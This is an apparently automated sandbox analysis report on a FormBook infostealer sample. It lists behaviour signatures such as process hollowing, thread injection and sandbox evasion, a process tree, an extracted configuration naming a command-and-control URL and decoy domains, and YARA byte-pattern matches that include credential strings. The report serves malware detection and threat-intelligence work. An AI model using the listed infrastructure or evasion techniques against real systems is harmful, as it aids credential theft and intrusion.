Edit tour

Windows Analysis Report
Iifpj4i2kC.exe

Overview

General Information

Sample name:	Iifpj4i2kC.exe renamed because original name is a hash value
Original sample name:	fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0.exe
Analysis ID:	1529801
MD5:	f6e047942236cefdcd6559bca66a7b3e
SHA1:	28aac545fcd0c9b11d2546110966b812d1c6d920
SHA256:	fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Unusual Parent Process For Cmd.EXE

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Iifpj4i2kC.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\Iifpj4i2kC.exe" MD5: F6E047942236CEFDCD6559BCA66A7B3E)

conhost.exe (PID: 1468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 6880 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 4872 cmdline: "C:\Windows\System32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

csc.exe (PID: 4340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

wlanext.exe (PID: 6432 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)

cmd.exe (PID: 1908 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.4578868311.000000000E24E000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa72:$a2: pass 0xa78:$a3: email 0xa7f:$a4: login 0xa86:$a5: signin 0xa97:$a6: persistent 0xc6a:$r1: C:\Users\user\AppData\Roaming\5M714DE5\5M7log.ini
00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x633691:$a1: 3C 30 50 4F 53 54 74 09 40 0x68ff21:$a1: 3C 30 50 4F 53 54 74 09 40 0x7820f9:$a1: 3C 30 50 4F 53 54 74 09 40 0x64a000:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x6a6890:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x798a68:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x637e0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x69469f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x786877:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x642cf7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x69f587:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x79175f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x636d48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x636fc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6935d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x693852:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7857b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x785a2a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x642af5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x69f385:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x79155d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6425e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x69ee71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x791049:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x642bf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x69f487:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x79165f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x642d6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x69f5ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7917d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6379da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x69426a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x786442:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x645c89:$sqlite3step: 68 34 1C 7B E1 0x645d9c:$sqlite3step: 68 34 1C 7B E1 0x6a2519:$sqlite3step: 68 34 1C 7B E1 0x6a262c:$sqlite3step: 68 34 1C 7B E1 0x7946f1:$sqlite3step: 68 34 1C 7B E1 0x794804:$sqlite3step: 68 34 1C 7B E1 0x645cb8:$sqlite3text: 68 38 2A 90 C5 0x645ddd:$sqlite3text: 68 38 2A 90 C5 0x6a2548:$sqlite3text: 68 38 2A 90 C5 0x6a266d:$sqlite3text: 68 38 2A 90 C5 0x794720:$sqlite3text: 68 38 2A 90 C5 0x794845:$sqlite3text: 68 38 2A 90 C5 0x645ccb:$sqlite3blob: 68 53 D8 7F 8C 0x645df3:$sqlite3blob: 68 53 D8 7F 8C 0x6a255b:$sqlite3blob: 68 53 D8 7F 8C 0x6a2683:$sqlite3blob: 68 53 D8 7F 8C 0x794733:$sqlite3blob: 68 53 D8 7F 8C 0x79485b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Iifpj4i2kC.exe PID: 6924	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x281da:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 6880	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x113:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: csc.exe PID: 4340	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x905f9:$a1: 3C 30 50 4F 53 54 74 09 40 0x92746:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x2a4f0:$s2: ~ Shell I 0x125688:$s2: ~ Shell I 0x27e137:$s2: ~ Shell I
Process Memory Space: wlanext.exe PID: 6432	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x177571:$a1: 3C 30 50 4F 53 54 74 09 40 0x17852d:$a1: 3C 30 50 4F 53 54 74 09 40 0x1a1270:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 41 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
